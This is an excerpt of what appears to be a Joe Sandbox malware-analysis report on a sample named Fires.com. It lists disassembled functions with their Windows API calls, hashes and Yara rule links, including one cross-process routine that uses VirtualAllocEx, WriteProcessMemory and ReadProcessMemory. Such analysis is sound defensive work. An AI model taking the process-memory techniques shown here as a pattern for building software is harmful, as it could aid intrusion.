_memcmp.LIBVCRUNTIME ref: 00DA608D
_memcmp.LIBVCRUNTIME ref: 00DA60AB
_memcmp.LIBVCRUNTIME ref: 00DA60BE
_memcmp.LIBVCRUNTIME ref: 00DA60D6
_memcmp.LIBVCRUNTIME ref: 00DA60EE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6f7d0cfd6cdfd99d0ec4c92594b88ed775805666c0deceaf7d104b33f94aa254
Instruction ID: 10ec1fe03f42cc26c510a00015dad7e773fbfda4d9adb0940d96335d1a245b37
Opcode Fuzzy Hash: 6f7d0cfd6cdfd99d0ec4c92594b88ed775805666c0deceaf7d104b33f94aa254
Instruction Fuzzy Hash: 4F01F5E2600306FBD31066215C42FAB731DDE22399B0C0420FD059A241E761ED94C2B9

Function 00D7316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00D6F64E,00D6545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D73170
_free.LIBCMT ref: 00D731A5
_free.LIBCMT ref: 00D731CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D731D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D731E2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9b9b9dc36b3a901df601267aa5e1a7c98da20d3ea0caced546dede093166dc57
Instruction ID: f19d4b25dd3e9ea6d99ec2cd440fdcf507e388aec1237273f230b454c771f467
Opcode Fuzzy Hash: 9b9b9dc36b3a901df601267aa5e1a7c98da20d3ea0caced546dede093166dc57
Instruction Fuzzy Hash: 310144726857007BC7122639AC86E6B2769EFC03727648029FC1CE2282FE22CF016271

Function 00DA08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?,?,00DA0C4E), ref: 00DA091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?), ref: 00DA0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?), ref: 00DA0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?), ref: 00DA0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?), ref: 00DA0960

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 23fd45360bf6723b662472010cfa46352b01e094a49d9df0082f5f2277fcc3d4
Instruction ID: d471da4955b6342c7a60de9271bb22e82abd16e5d23f71414932567efaae6c10
Opcode Fuzzy Hash: 23fd45360bf6723b662472010cfa46352b01e094a49d9df0082f5f2277fcc3d4
Instruction Fuzzy Hash: A3018B72601304AFEB114F55DC44B9B7FAEEB88792F180125F905E2212E771DD40EBB0

Function 00DAF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00DAF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00DAF2BC
Sleep.KERNEL32(00000000), ref: 00DAF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00DAF2CE
Sleep.KERNEL32 ref: 00DAF30A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0b711540736706437b724370cb4014ed66acf0c7fde261e44efd23ef750096e0
Instruction ID: 703c5276a6c401d184a120e94958f2f4de97460d79a6cf5f9cfa6696ddce7722
Opcode Fuzzy Hash: 0b711540736706437b724370cb4014ed66acf0c7fde261e44efd23ef750096e0
Instruction Fuzzy Hash: 6401E975D02619EBDF00AFE4EC49AEEBBB9FB0A711F0104A6E542F2290DB309554C7B5

Function 00DA1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DA1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DA1A99

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 91c9ca5067743e59b01f3b41a54d0989e0e18bca911a05471c10025a7b1f85c8
Instruction ID: 44814e862a87f93a42cb0665036ab405c2e36dbd384ce96ef9cf3cf18005b1b0
Opcode Fuzzy Hash: 91c9ca5067743e59b01f3b41a54d0989e0e18bca911a05471c10025a7b1f85c8
Instruction Fuzzy Hash: 6E018CB9642306BFDF114FA4DC48E6A3B6EEF893A4F250415F845C3360DA31DC418A70

Function 00DA1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DA1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DA1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DA1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DA1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DA19AE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0fe91a0672dad1acfce0ff1fbad711789c6c1ad2201be1906ef7fbd188830172
Instruction ID: a79c2849c21b45188b403e0668a4fac6866e71a8158d9ec37132e86fbd0b2321
Opcode Fuzzy Hash: 0fe91a0672dad1acfce0ff1fbad711789c6c1ad2201be1906ef7fbd188830172
Instruction Fuzzy Hash: 63F06D79241311BBDB215FA4EC59F573BAEEF8A7A0F140416FA45C73A0CA70E800CA70

Function 00DA1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DA1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DA1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DA1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DA1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DA194E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ed2ba83601c6882a0456dd3970c1e35b203270144fd4fdcabd5f8337482bdf58
Instruction ID: e80af38e6f49161a19a9ea85df6d2685b8f6b08e57734345be020007801ba233
Opcode Fuzzy Hash: ed2ba83601c6882a0456dd3970c1e35b203270144fd4fdcabd5f8337482bdf58
Instruction Fuzzy Hash: CFF04979241312BBDB210FA59C4AF573BAEEF8A7A0F140416FA45D73A0CA70DC00CA70

Function 00DB0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0CCB
CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0CD8
CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0CE5
CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0CF2
CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0CFF
CloseHandle.KERNEL32(?,?,?,?,00DB0B24,?,00DB3D41,?,00000001,00D83AF4,?), ref: 00DB0D0C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9494904f5a1612016d0aff63be91aa6ddb9f35f9ec8d9a498ddcaf7f810b4ca5
Instruction ID: 037dedee75f6eb32b761f0a4ebadf46caeecb3c7b959abb70023610ab1e169bf
Opcode Fuzzy Hash: 9494904f5a1612016d0aff63be91aa6ddb9f35f9ec8d9a498ddcaf7f810b4ca5
Instruction Fuzzy Hash: DD019C71801B15DFCB30AFA6D980857FBF9BF502153198A3ED19752931C7B0A988DEA0

Function 00DA65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00DA65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00DA65D6
MessageBeep.USER32(00000000), ref: 00DA65EE
KillTimer.USER32(?,0000040A), ref: 00DA660A
EndDialog.USER32(?,00000001), ref: 00DA6624

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9a1891b7fab0242c3cee92be74fc863bbd05a024c72b5a9493ea5b9bbf333768
Instruction ID: 3a35828ac410b95bc274ccdc9e2ee0e901305a24a0fc8ff3b4944af470c2ac51
Opcode Fuzzy Hash: 9a1891b7fab0242c3cee92be74fc863bbd05a024c72b5a9493ea5b9bbf333768
Instruction Fuzzy Hash: F1018130941308EBEF205F20DD4EB967BB9FF01705F08069AA187A14E1DBF0EA448AB1

Function 00D7DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D7DAD2

Part of subcall function 00D72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4), ref: 00D72D4E
Part of subcall function 00D72D38: GetLastError.KERNEL32(00E11DC4,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4,00E11DC4), ref: 00D72D60

_free.LIBCMT ref: 00D7DAE4
_free.LIBCMT ref: 00D7DAF6
_free.LIBCMT ref: 00D7DB08
_free.LIBCMT ref: 00D7DB1A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8267e0e38ef557972db0362bdba9a05c6f57de98159babee0e0b8ded49cf3dfb
Instruction ID: facf96f1e12ebeabcf735782bd386a2f1adcb8d17bf90ca6459f9608fa768955
Opcode Fuzzy Hash: 8267e0e38ef557972db0362bdba9a05c6f57de98159babee0e0b8ded49cf3dfb
Instruction Fuzzy Hash: 7CF0FF32548244AFC624EB99E982C6A77FEFF547107998C05F00DE7502EA21FC8087B4

Function 00D72610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D7262E

Part of subcall function 00D72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4), ref: 00D72D4E
Part of subcall function 00D72D38: GetLastError.KERNEL32(00E11DC4,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4,00E11DC4), ref: 00D72D60

_free.LIBCMT ref: 00D72640
_free.LIBCMT ref: 00D72653
_free.LIBCMT ref: 00D72664
_free.LIBCMT ref: 00D72675

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ac69e6efb50644103a047d6539749877bc47bd0067cbbbd492e09ed6641728fe
Instruction ID: 931ec136ac3c18f4ebafb75679d7ac4f8c8f40ce537fcd1b4579f5d422db8149
Opcode Fuzzy Hash: ac69e6efb50644103a047d6539749877bc47bd0067cbbbd492e09ed6641728fe
Instruction Fuzzy Hash: ABF0177090A1608FC712AF96EC018E83A68FB28750305C94AF518B2376D7350A5AAFF4

Function 00D712B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00D71469
__freea.LIBCMT ref: 00D71487

Part of subcall function 00D718A7: _free.LIBCMT ref: 00D718BF

Strings

am/pm, xrefs: 00D714EA
a/p, xrefs: 00D7154E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: bcc1dd7188762509ca0dc32a4467a9cf11241ea0b212b70ec1e6b50f0f091bef
Instruction ID: a65d9fb4a143585ab47738d7e6f06e00bc01011dbf3e122de12b390ccf2eea93
Opcode Fuzzy Hash: bcc1dd7188762509ca0dc32a4467a9cf11241ea0b212b70ec1e6b50f0f091bef
Instruction Fuzzy Hash: 45D1CF79910206DACB289F6CC8557BEB7B1FF55700F2C835AE94AAB250F2359D40CBB1

Function 00D4CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D4D253

Strings

t5, xrefs: 00D4CFC8
t5, xrefs: 00D4D23A
t5, xrefs: 00D4CFCF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5$t5$t5
API String ID: 1385522511-3228143211
Opcode ID: e39c74d428dfdf1823332d69da434219f58433d268007e7a5ae0bfb95e91a73c
Instruction ID: d685569253db05f5b2a4585ef1f1e80a8755daf17940b997aab8ae5e424a47ad
Opcode Fuzzy Hash: e39c74d428dfdf1823332d69da434219f58433d268007e7a5ae0bfb95e91a73c
Instruction Fuzzy Hash: 69913C75A00206DFCB14CF69C4906AABBF2FF59314F24815AD995AB345D731EE82CFA0

Function 00DA3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DA2B1D,?,?,00000034,00000800,?,00000034), ref: 00DABDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DA30AD

Part of subcall function 00DABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DA2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00DABDBF

Part of subcall function 00DABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00DABD1C
Part of subcall function 00DABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00DABD2C
Part of subcall function 00DABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00DABD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DA311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DA3167

Strings

@, xrefs: 00DA317F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 8ccd73be8a7456234d1b0985d62f7abe7aba4a42f032966890af38ebbf8088d4
Instruction ID: a6c8143156e28a730487dc4e2b4c82ec245f9fc848dff67735c511a8286c9d2c
Opcode Fuzzy Hash: 8ccd73be8a7456234d1b0985d62f7abe7aba4a42f032966890af38ebbf8088d4
Instruction Fuzzy Hash: B4411A72901218BFDB10DBA4CD81AEEBBB9EF46710F044495FA46B7181DA706E85CB70

Function 00D71A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com,00000104), ref: 00D71AD9
_free.LIBCMT ref: 00D71BA4
_free.LIBCMT ref: 00D71BAE

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, xrefs: 00D71AD0, 00D71AD7, 00D71B06, 00D71B3E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com
API String ID: 2506810119-3560742404
Opcode ID: ee3c5021a40678db3c9c7b0438ceab2cf5099072939ea550e3a6c10b3bc6fd06
Instruction ID: f3c5288a788736d7072af01d59804a0bf16ca192946209357bbe9166585c8793
Opcode Fuzzy Hash: ee3c5021a40678db3c9c7b0438ceab2cf5099072939ea550e3a6c10b3bc6fd06
Instruction Fuzzy Hash: D0315875A00218AFCB21DF9DDC85DDEBBFCEB85710B1481AAE50897221F6708E45D7B0

Function 00DACB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DACBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00DACBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E129C0,014B6858), ref: 00DACC40

Strings

0, xrefs: 00DACB8A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 7d3e77d6dba346154985e8137a854cee3faaf8361f2921091ce1c4aede398115
